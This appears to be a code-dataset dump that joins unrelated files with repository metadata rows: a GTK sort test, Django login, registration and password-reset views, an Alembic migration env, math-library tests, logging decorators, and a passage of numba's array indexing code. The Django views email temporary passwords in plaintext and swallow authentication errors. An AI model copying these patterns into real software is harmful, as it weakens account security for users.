sort_store.set_sort_column_id(-1, gtk.SORT_ASCENDING)
for i in xrange(20000):
store.append([d, "%s" % base64.b64encode(str(i)), "Some text", "Some text", "Some text", "Some text", 1000L])
sort_store.set_sort_column_id(1, gtk.SORT_ASCENDING)
end = time.time()
print ("test_store4 time : %.2f " % (end - start))
list_store(sort_store)
if __name__ == "__main__":
test_store1()
test_store2()
test_store3()
test_store4()
| gpl-2.0 | -2,058,047,734,032,428,000 | 33.7125 | 117 | 0.616853 | false |
kirti3192/spoken-website | mdldjango/views.py | 1 | 15036 | from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from models import MdlUser
from events.models import TrainingAttendance
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from forms import *
from django.contrib import messages
import xml.etree.cElementTree as etree
from xml.etree.ElementTree import ElementTree
# Create your views here.
import hashlib
import csv, os, time
from django.core.exceptions import PermissionDenied
from events.views import *
from events.models import *
from django.conf import settings
from events.forms import OrganiserForm
from django.core.mail import EmailMultiAlternatives
from validate_email import validate_email
from get_or_create_participant import get_or_create_participant, encript_password, check_csvfile
def authenticate(username = None, password = None):
try:
#print " i am in moodle auth"
user = MdlUser.objects.get(username=username)
#print user
pwd = user.password
p = encript_password(password)
pwd_valid = (pwd == p)
#print pwd
#print "------------"
if user and pwd_valid:
return user
except Exception, e:
#print e
#print "except ---"
return None
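# Usage sketch (illustrative): authenticate(username='jdoe', password='secret')
# returns the MdlUser row when encript_password(password) matches the stored
# hash, and None otherwise (mdl_login below relies on exactly this contract).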
def mdl_logout(request):
if 'mdluserid' in request.session:
del request.session['mdluserid']
request.session.save()
#print "logout !!"
return HttpResponseRedirect('/participant/login')
def mdl_login(request):
messages = {}
if request.POST:
username = request.POST["username"]
password = request.POST["password"]
if not username or not password:
            messages['error'] = "Please enter a valid Username and Password!"
#return HttpResponseRedirect('/participant/login')
user = authenticate(username = username, password = password)
if user:
request.session['mdluserid'] = user.id
request.session['mdluseremail'] = user.email
request.session['mdlusername'] = user.username
request.session['mdluserinstitution'] = user.institution
request.session.save()
request.session.modified = True
else:
            messages['error'] = "Username or Password doesn't match!"
if request.session.get('mdluserid'):
#print "Current user is ", request.session.get('mdluserid')
return HttpResponseRedirect('/participant/index')
context = {'message':messages}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_login.html', context)
def index(request):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
try:
mdluser = MdlUser.objects.get(id=mdluserid)
except:
return HttpResponseRedirect('/participant/login')
if str(mdluser.institution).isdigit():
academic = None
try:
academic = AcademicCenter.objects.get(id = mdluser.institution)
except:
pass
if academic:
category = int(request.GET.get('category', 4))
if not (category > 0 and category < 6):
return HttpResponseRedirect('/participant/index/?category=4')
upcoming_workshop = None
upcoming_test = None
past_workshop = None
past_test = None
ongoing_test = None
if category == 3:
upcoming_workshop = Training.objects.filter((Q(status = 0) | Q(status = 1) | Q(status = 2) | Q(status = 3)), academic_id=mdluser.institution, tdate__gte=datetime.date.today()).order_by('-tdate')
if category == 5:
upcoming_test = Test.objects.filter(status=2, academic_id=mdluser.institution, tdate__gt=datetime.date.today()).order_by('-tdate')
if category == 1:
past_workshop = Training.objects.filter(id__in = TrainingAttendance.objects.filter(mdluser_id = mdluser.id).values_list('training_id'), status = 4).order_by('-tdate')
if category == 2:
past_test = Test.objects.filter(id__in = TestAttendance.objects.filter(mdluser_id = mdluser.id).values_list('test_id'), status = 4).order_by('-tdate')
if category == 4:
ongoing_test = Test.objects.filter(status=3, academic_id=mdluser.institution, tdate = datetime.date.today()).order_by('-tdate')
        #print past_workshop
context = {
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
'upcoming_workshop' : upcoming_workshop,
'upcoming_test' : upcoming_test,
'past_workshop' : past_workshop,
'past_test' : past_test,
'ongoing_test' : ongoing_test,
'category' : category,
'ONLINE_TEST_URL' : settings.ONLINE_TEST_URL
}
context.update(csrf(request))
return render(request, 'mdl/templates/mdluser_index.html', context)
form = OrganiserForm()
if request.method == 'POST':
form = OrganiserForm(request.POST)
if form.is_valid():
mdluser.institution = form.cleaned_data['college']
mdluser.save()
return HttpResponseRedirect('/participant/index')
context = {
'form' : form
}
context.update(csrf(request))
return render(request, 'mdl/templates/academic.html', context)
@login_required
def offline_details(request, wid, category):
user = request.user
wid = int(wid)
category = int(category)
#print category
user = request.user
form = OfflineDataForm()
try:
if category == 1:
Training.objects.get(pk=wid, status__lt=4)
elif category == 2:
Training.objects.get(pk=wid, status__lt=4)
else:
raise PermissionDenied('You are not allowed to view this page!')
except Exception, e:
raise PermissionDenied('You are not allowed to view this page!')
if request.method == 'POST':
form = OfflineDataForm(request.POST, request.FILES)
try:
if category == 1:
w = Training.objects.get(id = wid)
elif category == 2:
w = Training.objects.get(id = wid)
else:
raise PermissionDenied('You are not allowed to view this page!')
except:
raise PermissionDenied('You are not allowed to view this page!')
if form.is_valid():
file_path = settings.MEDIA_ROOT + 'training/' + str(wid) + str(time.time())
f = request.FILES['xml_file']
fout = open(file_path, 'wb+')
for chunk in f.chunks():
fout.write(chunk)
fout.close()
error_line_no = ''
csv_file_error = 0
csv_file_error, error_line_no = check_csvfile(user, file_path, w, flag=1)
os.unlink(file_path)
#update participant count
update_participants_count(w)
if error_line_no:
messages.error(request, error_line_no)
#update logs
if category == 1:
                message = w.academic.institution_name+" has submitted Offline "+w.foss.foss+" workshop attendance dated "+w.tdate.strftime("%Y-%m-%d")
update_events_log(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 0, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
                    messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross-check and verify the details before submitting.")
return HttpResponseRedirect('/software-training/workshop/'+str(wid)+'/attendance/')
else:
                message = w.academic.institution_name+" has submitted Offline training attendance."
update_events_log(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5)
update_events_notification(user_id = user.id, role = 2, category = 2, category_id = w.id, academic = w.academic_id, status = 5, message = message)
if not error_line_no:
                    messages.success(request, "Thank you for uploading the Attendance. Now make sure that you cross-check and verify the details before submitting.")
return HttpResponseRedirect('/software-training/training/'+str(wid)+'/attendance/')
        messages.error(request, "Please upload a CSV file!")
context = {
'form': form,
}
messages.info(request, """
Please upload the CSV file which you have generated.
To know more <a href="http://process.spoken-tutorial.org/images/9/96/Upload_Attendance.pdf" target="_blank">Click here</a>.
""")
context.update(csrf(request))
return render(request, 'mdl/templates/offline_details.html', context)
def mdl_register(request):
form = RegisterForm()
if request.method == "POST":
form = RegisterForm(request.POST)
#Email exits
try:
user = MdlUser.objects.filter(email=request.POST['email']).first()
if user:
                messages.success(request, "Email : "+request.POST['email']+" already registered on this website. Please click <a href='http://www.spoken-tutorial.org/participant/login/'>here</a> to login")
except Exception, e:
#print e
pass
if form.is_valid():
mdluser = MdlUser()
mdluser.auth = 'manual'
mdluser.institution = form.cleaned_data['college']
mdluser.gender = form.cleaned_data['gender']
mdluser.firstname = form.cleaned_data['firstname']
mdluser.lastname = form.cleaned_data['lastname']
mdluser.email = form.cleaned_data['email']
mdluser.username = form.cleaned_data['username']
mdluser.password = encript_password(form.cleaned_data['password'])
mdluser.confirmed = 1
mdluser.mnethostid = 1
mdluser.save()
messages.success(request, "User " + form.cleaned_data['firstname'] +" "+form.cleaned_data['lastname']+" Created!")
return HttpResponseRedirect('/participant/register/')
context = {}
context['form'] = form
context.update(csrf(request))
return render(request, 'mdl/templates/register.html', context)
def feedback(request, wid):
mdluserid = request.session.get('mdluserid')
mdlusername = request.session.get('mdlusername')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
form = FeedbackForm()
mdluserid = request.session.get('mdluserid')
if not mdluserid:
return HttpResponseRedirect('/participant/login')
w = None
try:
w = Training.objects.select_related().get(pk=wid)
#check if feedback already exits
TrainingFeedback.objects.get(training_id = wid, mdluser_id = mdluserid)
messages.success(request, "We have already received your feedback. ")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
#print e
pass
if request.method == 'POST':
form = FeedbackForm(request.POST)
if form.is_valid():
try:
form_data = form.save(commit=False)
form_data.training_id = wid
form_data.mdluser_id = mdluserid
form_data.save()
try:
wa = TrainingAttendance.objects.get(mdluser_id=mdluserid, training_id = wid)
wa.status = 2
wa.save()
except:
wa = TrainingAttendance()
wa.training_id = wid
wa.mdluser_id = mdluserid
wa.status = 1
wa.save()
messages.success(request, "Thank you for your valuable feedback.")
return HttpResponseRedirect('/participant/index/?category=1')
except Exception, e:
print e
pass
#return HttpResponseRedirect('/participant/index/')
context = {
'form' : form,
'w' : w,
'mdluserid' : mdluserid,
'mdlusername' : mdlusername,
}
context.update(csrf(request))
return render(request, 'mdl/templates/feedback.html', context)
def forget_password(request):
context = {}
form = PasswordResetForm()
if request.method == "POST":
form = PasswordResetForm(request.POST)
if form.is_valid():
password_string = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))
user = MdlUser.objects.filter(email=request.POST['email']).first()
password_encript = encript_password(password_string)
user.password = password_encript
user.save()
subject = "Spoken Tutorial Online Test password reset"
to = [user.email]
message = '''Hi {0},
Your account password at 'Spoken Tutorials Online Test Center' has been reset
and you have been issued with a new temporary password.
Your current login information is now:
username: {1}
password: {2}
Please go to this page to change your password:
{3}
In most mail programs, this should appear as a blue link
which you can just click on. If that doesn't work,
then cut and paste the address into the address
line at the top of your web browser window.
Cheers from the 'Spoken Tutorials Online Test Center' administrator,
Admin Spoken Tutorials
'''.format(user.firstname, user.username, password_string, 'http://onlinetest.spoken-tutorial.org/login/change_password.php')
# send email
email = EmailMultiAlternatives(
subject, message, '[email protected]',
to = to, bcc = [], cc = [],
headers={'Reply-To': '[email protected]', "Content-type":"text/html;charset=iso-8859-1"}
)
result = email.send(fail_silently=False)
messages.success(request, "New password sent to your email "+user.email)
return HttpResponseRedirect('/participant/login/')
context = {
'form': form
}
context.update(csrf(request))
return render(request, 'mdl/templates/password_reset.html', context)
| gpl-3.0 | 2,444,503,224,367,037,000 | 41.235955 | 210 | 0.60415 | false |
dedalusj/PaperChase | backend/alembic/env.py | 1 | 2339 | from __future__ import with_statement
import sys
from os.path import dirname, abspath
sys.path.append(dirname(dirname(abspath(__file__))))
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import fileConfig
from paperchase.models import *
from paperchase.core import db
from paperchase.api import create_app
app = create_app()
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This line sets up loggers basically.
fileConfig(config.config_file_name)
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
alembic_config = config.get_section(config.config_ini_section)
alembic_config['sqlalchemy.url'] = app.config['SQLALCHEMY_DATABASE_URI']
engine = engine_from_config(
alembic_config,
prefix='sqlalchemy.',
poolclass=pool.NullPool)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=db.metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
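# Usage note (illustrative): Alembic itself imports and executes this
# env.py. Typical invocations are `alembic upgrade head` (online mode,
# runs against the engine configured above) and
# `alembic upgrade head --sql` (offline mode, emits the SQL instead of
# executing it).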
| mit | -7,431,257,112,022,274,000 | 26.197674 | 76 | 0.690894 | false |
IngenuityEngine/arkMath | test/test_helpers.py | 1 | 2374 |
# Standard modules
from expects import *
# Our modules
import arkInit
arkInit.init()
import tryout
import arkMath
from arkMath import Mat44
class test(tryout.TestSuite):
title = 'test/test_helpers.py'
def is_vector(self):
vec = arkMath.Vec(1,2,3,4)
self.assertEqual(arkMath.isVector(vec), True)
self.assertEqual(arkMath.isVector(12), False)
def ensure_vector(self):
vec = arkMath.Vec(1,2,3,4)
ensured = arkMath.ensureVector(vec)
self.assertEqual(ensured.x, vec.x)
ensured = arkMath.ensureVector(12)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 0)
ensured = arkMath.ensureVector(12, 5, 4, 9)
self.assertEqual(ensured.x, 12)
self.assertEqual(ensured.y, 5)
self.assertEqual(ensured.z, 4)
self.assertEqual(ensured.w, 9)
ensured = arkMath.ensureVector([15, 25, 7, 2])
self.assertEqual(ensured.x, 15)
self.assertEqual(ensured.y, 25)
self.assertEqual(ensured.z, 7)
self.assertEqual(ensured.w, 2)
def is_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
matFromList = Mat44(matList)
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
matFromVecs = Mat44(vec1, vec2, vec3, vec4)
justVec = arkMath.Vec(1, 2, 3, 4)
self.assertEqual(arkMath.isMatrix(matFromList), True)
self.assertEqual(arkMath.isMatrix(matFromVecs), True)
self.assertEqual(arkMath.isMatrix(justVec), False)
# Should work if input already a matrix, 4 vectors, or 16 matrix values
def ensure_matrix(self):
matList = [1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0]
goalMat = Mat44(matList)
sixteenMat = arkMath.ensureMatrix(1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0)
self.assertEqual(type(sixteenMat), type(goalMat))
vec1 = arkMath.Vec(1.0, 0.0, 0.0, 0.0)
vec2 = arkMath.Vec(0.0, 1.0, 0.0, 0.0)
vec3 = arkMath.Vec(0.0, 0.0, 1.0, 0.0)
vec4 = arkMath.Vec(0.0, 0.0, 0.0, 1.0)
vecsMat = arkMath.ensureMatrix(vec1, vec2, vec3, vec4)
self.assertEqual(type(vecsMat), type(goalMat))
		# ensureMatrix of an existing matrix should just return itself
selfMat = arkMath.ensureMatrix(goalMat)
self.assertEqual(type(selfMat), type(goalMat))
if __name__ == '__main__':
tryout.run(test)
| mit | 8,659,748,860,809,815,000 | 29.831169 | 115 | 0.667228 | false |
leingang/plg | plg/utils/decorators.py | 1 | 1819 | #!/usr/bin/env python
import logging
def debug_entry(f):
"""
debug the entry into a function
>>> import sys
>>> import logging
The stream configuration is just to make doctests work.
In practice, you'd probably want the default stream sys.stderr.
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_entry
... def f(x):
... return x*x
...
>>> f(2)
DEBUG:f:Entering: arguments=(2,), keyword arguments={}
4
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
logger.debug("Entering: arguments=%s, keyword arguments=%s",args,kwargs)
return f(*args,**kwargs)
new_f.__name__ = f.__name__
return new_f
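# A minimal variant (sketch; `debug_entry_wraps` is not used elsewhere in
# this module): functools.wraps carries over __doc__, __module__ and other
# metadata in addition to __name__.
import functools

def debug_entry_wraps(f):
    @functools.wraps(f)
    def new_f(*args, **kwargs):
        # Same logging behaviour as debug_entry above
        logging.getLogger(f.__name__).debug(
            "Entering: arguments=%s, keyword arguments=%s", args, kwargs)
        return f(*args, **kwargs)
    return new_f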
def debug_result(f):
"""
Debug the result of a function
>>> import sys
>>> import logging
>>> logging.basicConfig(level=logging.DEBUG,stream=sys.stdout)
>>> @debug_result
... def f(x):
... return x*x
...
>>> f(2)+10
DEBUG:f:Result: 4
14
Decorators can be chained (that's kind of the point!).
>>> @debug_entry
... @debug_result
... def g(x):
... return 2*x
...
>>> g(3)+17
DEBUG:g:Entering: arguments=(3,), keyword arguments={}
DEBUG:g:Result: 6
23
"""
def new_f(*args,**kwargs):
logger=logging.getLogger(f.__name__)
result=f(*args,**kwargs)
logger.debug("Result: %s",repr(result))
return result
new_f.__name__ = f.__name__
return new_f
if __name__ == "__main__":
import doctest
doctest.testmod()
# from decorators import *
# import logging
# logging.basicConfig(level=logging.DEBUG)
# @debug_result
# @debug_entry
# def f(x):
# return x*x
#
#f(2) | gpl-3.0 | 2,352,242,054,812,354,000 | 22.333333 | 80 | 0.548103 | false |
pitrou/numba | numba/targets/arrayobj.py | 1 | 109012 | """
Implementation of operations on Array objects and objects supporting
the buffer protocol.
"""
from __future__ import print_function, absolute_import, division
import math
import llvmlite.llvmpy.core as lc
from llvmlite.llvmpy.core import Constant
import numpy
from numba import types, cgutils, typing
from numba.numpy_support import as_dtype
from numba.numpy_support import version as numpy_version
from numba.targets.imputils import (builtin, builtin_attr, implement,
impl_attribute, impl_attribute_generic,
iternext_impl, impl_ret_borrowed,
impl_ret_new_ref, impl_ret_untracked)
from numba.typing import signature
from . import quicksort, slicing
def increment_index(builder, val):
"""
Increment an index *val*.
"""
one = Constant.int(val.type, 1)
# We pass the "nsw" flag in the hope that LLVM understands the index
# never changes sign. Unfortunately this doesn't always work
# (e.g. ndindex()).
return builder.add(val, one, flags=['nsw'])
def set_range_metadata(builder, load, lower_bound, upper_bound):
"""
Set the "range" metadata on a load instruction.
Note the interval is in the form [lower_bound, upper_bound).
"""
range_operands = [Constant.int(load.type, lower_bound),
Constant.int(load.type, upper_bound)]
md = builder.module.add_metadata(range_operands)
load.set_metadata("range", md)
def mark_positive(builder, load):
"""
Mark the result of a load instruction as positive (or zero).
"""
upper_bound = (1 << (load.type.width - 1)) - 1
set_range_metadata(builder, load, 0, upper_bound)
def make_array(array_type):
"""
Return the Structure representation of the given *array_type*
(an instance of types.Array).
"""
base = cgutils.create_struct_proxy(array_type)
ndim = array_type.ndim
class ArrayStruct(base):
@property
def shape(self):
"""
Override .shape to inform LLVM that its elements are all positive.
"""
builder = self._builder
if ndim == 0:
return base.__getattr__(self, "shape")
# Unfortunately, we can't use llvm.assume as its presence can
# seriously pessimize performance,
# *and* the range metadata currently isn't improving anything here,
# see https://llvm.org/bugs/show_bug.cgi?id=23848 !
ptr = self._get_ptr_by_name("shape")
dims = []
for i in range(ndim):
dimptr = cgutils.gep_inbounds(builder, ptr, 0, i)
load = builder.load(dimptr)
dims.append(load)
mark_positive(builder, load)
return cgutils.pack_array(builder, dims)
return ArrayStruct
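# Typical use elsewhere in this module (illustrative):
#   arycls = make_array(aryty)
#   ary = arycls(context, builder, value=val)
#   shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)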
def get_itemsize(context, array_type):
"""
Return the item size for the given array or buffer type.
"""
llty = context.get_data_type(array_type.dtype)
return context.get_abi_sizeof(llty)
def load_item(context, builder, arrayty, ptr):
"""
Load the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.unpack_value(builder, arrayty.dtype, ptr,
align=align)
def store_item(context, builder, arrayty, val, ptr):
"""
Store the item at the given array pointer.
"""
align = None if arrayty.aligned else 1
return context.pack_value(builder, arrayty.dtype, val, ptr, align=align)
def fix_integer_index(context, builder, idxty, idx, size):
"""
    Fix the integer index's type and value for the given dimension size.
"""
if idxty.signed:
ind = context.cast(builder, idx, idxty, types.intp)
ind = slicing.fix_index(builder, ind, size)
else:
ind = context.cast(builder, idx, idxty, types.uintp)
return ind
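# Pure-Python sketch of the signed wraparound rule applied above
# (illustrative only): negative indices count from the end of the
# dimension, e.g.
#   def _py_fix_index(idx, size):
#       return idx + size if idx < 0 else idx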
def populate_array(array, data, shape, strides, itemsize, meminfo,
parent=None):
"""
Helper function for populating array structures.
This avoids forgetting to set fields.
*shape* and *strides* can be Python tuples or LLVM arrays.
"""
context = array._context
builder = array._builder
datamodel = array._datamodel
required_fields = set(datamodel._fields)
if meminfo is None:
meminfo = Constant.null(context.get_value_type(
datamodel.get_type('meminfo')))
intp_t = context.get_value_type(types.intp)
if isinstance(shape, (tuple, list)):
shape = cgutils.pack_array(builder, shape, intp_t)
if isinstance(strides, (tuple, list)):
strides = cgutils.pack_array(builder, strides, intp_t)
attrs = dict(shape=shape,
strides=strides,
data=data,
itemsize=itemsize,
meminfo=meminfo,)
# Set `parent` attribute
if parent is None:
attrs['parent'] = Constant.null(context.get_value_type(
datamodel.get_type('parent')))
else:
attrs['parent'] = parent
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, shape, shape.type.count)
if unpacked_shape:
# Shape is not empty
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
else:
# Shape is empty
nitems = context.get_constant(types.intp, 1)
attrs['nitems'] = nitems
# Make sure that we have all the fields
got_fields = set(attrs.keys())
if got_fields != required_fields:
raise ValueError("missing {0}".format(required_fields - got_fields))
# Set field value
for k, v in attrs.items():
setattr(array, k, v)
return array
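# Typical call pattern (illustrative), as used by the view-building code
# further below:
#   populate_array(ret, data=ary.data, shape=shapes, strides=strides,
#                  itemsize=ary.itemsize, meminfo=ary.meminfo,
#                  parent=ary.parent)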
def update_array_info(aryty, array):
"""
Update some auxiliary information in *array* after some of its fields
were changed. `itemsize` and `nitems` are updated.
"""
context = array._context
builder = array._builder
# Calc num of items from shape
nitems = context.get_constant(types.intp, 1)
unpacked_shape = cgutils.unpack_tuple(builder, array.shape, aryty.ndim)
for axlen in unpacked_shape:
nitems = builder.mul(nitems, axlen)
array.nitems = nitems
array.itemsize = context.get_constant(types.intp,
get_itemsize(context, aryty))
def make_arrayiter_cls(iterator_type):
"""
Return the Structure representation of the given *iterator_type* (an
instance of types.ArrayIteratorType).
"""
return cgutils.create_struct_proxy(iterator_type)
@builtin
@implement('getiter', types.Kind(types.Buffer))
def getiter_array(context, builder, sig, args):
[arrayty] = sig.args
[array] = args
iterobj = make_arrayiter_cls(sig.return_type)(context, builder)
zero = context.get_constant(types.intp, 0)
indexptr = cgutils.alloca_once_value(builder, zero)
iterobj.index = indexptr
iterobj.array = array
# Incref array
if context.enable_nrt:
context.nrt_incref(builder, arrayty, array)
res = iterobj._getvalue()
# Note: a decref on the iterator will dereference all internal MemInfo*
out = impl_ret_new_ref(context, builder, sig.return_type, res)
return out
def _getitem_array1d(context, builder, arrayty, array, idx, wraparound):
"""
Look up and return an element from a 1D array.
"""
ptr = cgutils.get_item_pointer(builder, arrayty, array, [idx],
wraparound=wraparound)
return load_item(context, builder, arrayty, ptr)
@builtin
@implement('iternext', types.Kind(types.ArrayIterator))
@iternext_impl
def iternext_array(context, builder, sig, args, result):
[iterty] = sig.args
[iter] = args
arrayty = iterty.array_type
if arrayty.ndim != 1:
# TODO
raise NotImplementedError("iterating over %dD array" % arrayty.ndim)
iterobj = make_arrayiter_cls(iterty)(context, builder, value=iter)
ary = make_array(arrayty)(context, builder, value=iterobj.array)
nitems, = cgutils.unpack_tuple(builder, ary.shape, count=1)
index = builder.load(iterobj.index)
is_valid = builder.icmp(lc.ICMP_SLT, index, nitems)
result.set_valid(is_valid)
with builder.if_then(is_valid):
value = _getitem_array1d(context, builder, arrayty, ary, index,
wraparound=False)
result.yield_(value)
nindex = builder.add(index, context.get_constant(types.intp, 1))
builder.store(nindex, iterobj.index)
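# Illustrative equivalence: a `for v in arr` loop over a 1D array lowers
# to one 'getiter' call (above) followed by repeated 'iternext' calls;
# arrays of higher dimension are rejected by the ndim check above.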
#-------------------------------------------------------------------------------
# Basic indexing (with integers and slices only)
def basic_indexing(context, builder, aryty, ary, index_types, indices):
"""
Perform basic indexing on the given array.
A (data pointer, shapes, strides) tuple is returned describing
the corresponding view.
"""
zero = context.get_constant(types.intp, 0)
shapes = cgutils.unpack_tuple(builder, ary.shape, aryty.ndim)
strides = cgutils.unpack_tuple(builder, ary.strides, aryty.ndim)
output_indices = []
output_shapes = []
output_strides = []
ax = 0
for indexval, idxty in zip(indices, index_types):
if idxty is types.ellipsis:
            # Fill up missing dimensions in the middle
n_missing = aryty.ndim - len(indices) + 1
for i in range(n_missing):
output_indices.append(zero)
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
continue
# Regular index value
if idxty == types.slice3_type:
slice = slicing.Slice(context, builder, value=indexval)
cgutils.guard_invalid_slice(context, builder, slice)
slicing.fix_slice(builder, slice, shapes[ax])
output_indices.append(slice.start)
sh = slicing.get_slice_length(builder, slice)
st = slicing.fix_stride(builder, slice, strides[ax])
output_shapes.append(sh)
output_strides.append(st)
elif isinstance(idxty, types.Integer):
ind = fix_integer_index(context, builder, idxty, indexval,
shapes[ax])
output_indices.append(ind)
else:
raise NotImplementedError("unexpected index type: %s" % (idxty,))
ax += 1
# Fill up missing dimensions at the end
assert ax <= aryty.ndim
while ax < aryty.ndim:
output_shapes.append(shapes[ax])
output_strides.append(strides[ax])
ax += 1
# No need to check wraparound, as negative indices were already
# fixed in the loop above.
dataptr = cgutils.get_item_pointer(builder, aryty, ary,
output_indices,
wraparound=False)
return (dataptr, output_shapes, output_strides)
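# NumPy-level sketch of the slice arithmetic above (illustrative):
#   >>> a = numpy.arange(10)
#   >>> v = a[2:8:2]                   # start=2 offsets the data pointer
#   >>> v.shape[0]                     # length of range(2, 8, 2)
#   3
#   >>> v.strides[0] == 2 * a.strides[0]
#   True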
def make_view(context, builder, aryty, ary, return_type,
data, shapes, strides):
"""
Build a view over the given array with the given parameters.
"""
retary = make_array(return_type)(context, builder)
populate_array(retary,
data=data,
shape=shapes,
strides=strides,
itemsize=ary.itemsize,
meminfo=ary.meminfo,
parent=ary.parent)
return retary
def _getitem_array_generic(context, builder, return_type, aryty, ary,
index_types, indices):
"""
Return the result of indexing *ary* with the given *indices*.
"""
assert isinstance(return_type, types.Buffer)
dataptr, view_shapes, view_strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
# Build array view
retary = make_view(context, builder, aryty, ary, return_type,
dataptr, view_shapes, view_strides)
return retary._getvalue()
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.Integer))
def getitem_arraynd_intp(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, ary)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, (idxty,), (idx,))
ndim = aryty.ndim
if ndim == 1:
# Return a value
assert not shapes
result = load_item(context, builder, aryty, dataptr)
elif ndim > 1:
# Return a subview over the array
out_ary = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
result = out_ary._getvalue()
else:
raise NotImplementedError("1D indexing into %dD array" % aryty.ndim)
return impl_ret_borrowed(context, builder, sig.return_type, result)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.slice3_type)
def getitem_array1d_slice(context, builder, sig, args):
aryty, idxty = sig.args
ary, idx = args
ary = make_array(aryty)(context, builder, value=ary)
res = _getitem_array_generic(context, builder, sig.return_type,
aryty, ary, (idxty,), (idx,))
return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('getitem', types.Kind(types.Buffer), types.Kind(types.BaseTuple))
def getitem_array_tuple(context, builder, sig, args):
aryty, tupty = sig.args
ary, tup = args
ary = make_array(aryty)(context, builder, ary)
index_types = tupty.types
indices = cgutils.unpack_tuple(builder, tup, count=len(tupty))
if any(isinstance(ty, types.Array) for ty in index_types):
return fancy_getitem(context, builder, sig, args,
aryty, ary, index_types, indices)
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
ndim = aryty.ndim
if isinstance(sig.return_type, types.Array):
# Generic array slicing
res = make_view(context, builder, aryty, ary, sig.return_type,
dataptr, shapes, strides)
res = res._getvalue()
else:
# Plain indexing (returning a scalar)
assert not shapes
res = load_item(context, builder, aryty, dataptr)
    return impl_ret_borrowed(context, builder, sig.return_type, res)
@builtin
@implement('setitem', types.Kind(types.Buffer), types.Any, types.Any)
def setitem_array(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
try:
dataptr, shapes, strides = \
basic_indexing(context, builder, aryty, ary, index_types, indices)
except NotImplementedError:
use_fancy_indexing = True
else:
use_fancy_indexing = bool(shapes)
if use_fancy_indexing:
# Index describes a non-trivial view => use generic slice assignment
# (NOTE: this also handles scalar broadcasting)
return fancy_setslice(context, builder, sig, args,
index_types, indices)
    # Store the source value at the given location
val = context.cast(builder, val, valty, aryty.dtype)
store_item(context, builder, aryty, val, dataptr)
@builtin
@implement(types.len_type, types.Kind(types.Buffer))
def array_len(context, builder, sig, args):
(aryty,) = sig.args
(ary,) = args
arystty = make_array(aryty)
ary = arystty(context, builder, ary)
shapeary = ary.shape
res = builder.extract_value(shapeary, 0)
return impl_ret_untracked(context, builder, sig.return_type, res)
#-------------------------------------------------------------------------------
# Advanced / fancy indexing
class Indexer(object):
"""
Generic indexer interface, for generating indices over a fancy indexed
array on a single dimension.
"""
def prepare(self):
"""
Prepare the indexer by initializing any required variables, basic
